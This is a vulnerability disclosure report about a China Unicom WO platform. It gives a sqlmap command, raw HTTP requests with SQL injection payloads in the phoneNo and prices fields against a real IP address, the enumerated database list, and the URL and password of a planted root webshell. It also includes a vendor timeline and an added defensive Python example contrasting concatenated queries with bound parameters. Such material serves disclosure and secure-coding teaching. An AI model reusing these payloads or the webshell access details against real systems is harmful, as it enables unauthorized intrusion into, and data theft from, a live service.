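2014-11-04: Details sent to the vendor, awaiting vendor handling
2014-11-09: Vendor confirmed; details disclosed to the vendor only
2014-11-19: Details disclosed to core white hats and experts in related fields
2014-11-29: Details disclosed to regular white hats
2014-12-09: Details disclosed to intern white hats
2014-12-19: Details disclosed to the public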
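Multiple SQL injections + upload + shell + root on a China Unicom WO platform
I did not look at the databases closely, so I don't know how large the impact is. There are 11 databases; the current one has 606 tables, including a dozen or so user tables, and in one of those tables the users are all agents. Got a shell with root privileges; did not dare go any deeper.
SQL injection first: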
sqlmap -r '/root/Desktop/3.1' --dbms=oracle --data="loginName=1&password1=g" --sql-shell
1,
POST /reg/modifyPasswordDo.html HTTP/1.1
Content-Length: 157
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://211.95.193.67:80/
Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBA
Host: 211.95.193.67
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*

loginName=1&password1=g&phoneCode=555-666-0606&phoneNo=555-666-0606
2,
POST /web/list.html HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Referer: http://211.95.193.67:80/
Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBA
Host: 211.95.193.67
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*

orderBy=code&pageNo=1&prices=1'%22&productTypeid=
3,
POST /reg/modifyPasswordDo.html HTTP/1.1
Content-Length: 155
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://211.95.193.67:80/
Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBA
Host: 211.95.193.67
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*

loginName=pplxundg&password=g00dPa%24%24w0rD&password1=g00dPa%24%24w0rD&phoneCode=555-666-0606&phoneNo=-1'%20OR%203*2*1%3d6%20AND%20000949%3d000949%20--%20
available databases [11]:
[*] DBSNMP
[*] EXFSYS
[*] OUTLN
[*] QDYX
[*] QDYX_YJ
[*] QDYXTEST
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
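The phoneNo and prices values in the requests above end up inside the SQL text, and orderBy names a column. The following is an added example, not code from the report or from the affected platform: it contrasts a string-built query with a bound one using the phoneNo test string from request 3, and shows an allowlist for orderBy. sqlite3 stands in for the Oracle backend, and the table, column and function names are hypothetical.

```python
import re
import sqlite3

# Boolean test string sent as phoneNo in request 3, URL-decoded.
PAGE_PHONE_NO = "-1' OR 3*2*1=6 AND 000949=000949 -- "

def make_db():
    # Constructed sample rows; not data from the affected system.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login_name TEXT, phone_no TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "13800000001"), ("bob", "13800000002")])
    return db

def lookup_concat(db, phone_no):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so the quote closes the literal and the OR clause is evaluated.
    sql = "SELECT login_name FROM users WHERE phone_no = '" + phone_no + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, phone_no):
    # Hardened pattern: the value is bound and is only ever compared as data.
    sql = "SELECT login_name FROM users WHERE phone_no = ?"
    return [row[0] for row in db.execute(sql, (phone_no,))]

def valid_phone_no(value):
    # Input validation as a second layer: digits and hyphens only,
    # which accepts the 555-666-0606 form seen in request 1.
    return re.fullmatch(r"[0-9-]{5,20}", value) is not None

# Column names cannot be bound as parameters, so orderBy is mapped
# through a fixed allowlist (hypothetical column set).
ORDER_COLUMNS = {"code": "code", "price": "price"}

def order_by_clause(order_by):
    try:
        return "ORDER BY " + ORDER_COLUMNS[order_by]
    except KeyError:
        raise ValueError("orderBy is not an allowed column") from None

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concat(db, PAGE_PHONE_NO))
    print("bound:       ", lookup_bound(db, PAGE_PHONE_NO))
    print("valid format:", valid_phone_no(PAGE_PHONE_NO))
    print(order_by_clause("code"))
```
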
Upload
ROOT shell
http://211.95.193.67/files/head/20141103183718.jsp webshell password: jspspy
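Severity: High
Vulnerability Rank: 16
Confirmed: 2014-11-09 09:15
CNVD confirmed and reproduced the situation described, and has handed it to CNCERT to notify China Unicom Group directly for handling. Scored on the multiple risk points and the information-disclosure risk, rank 16
None yet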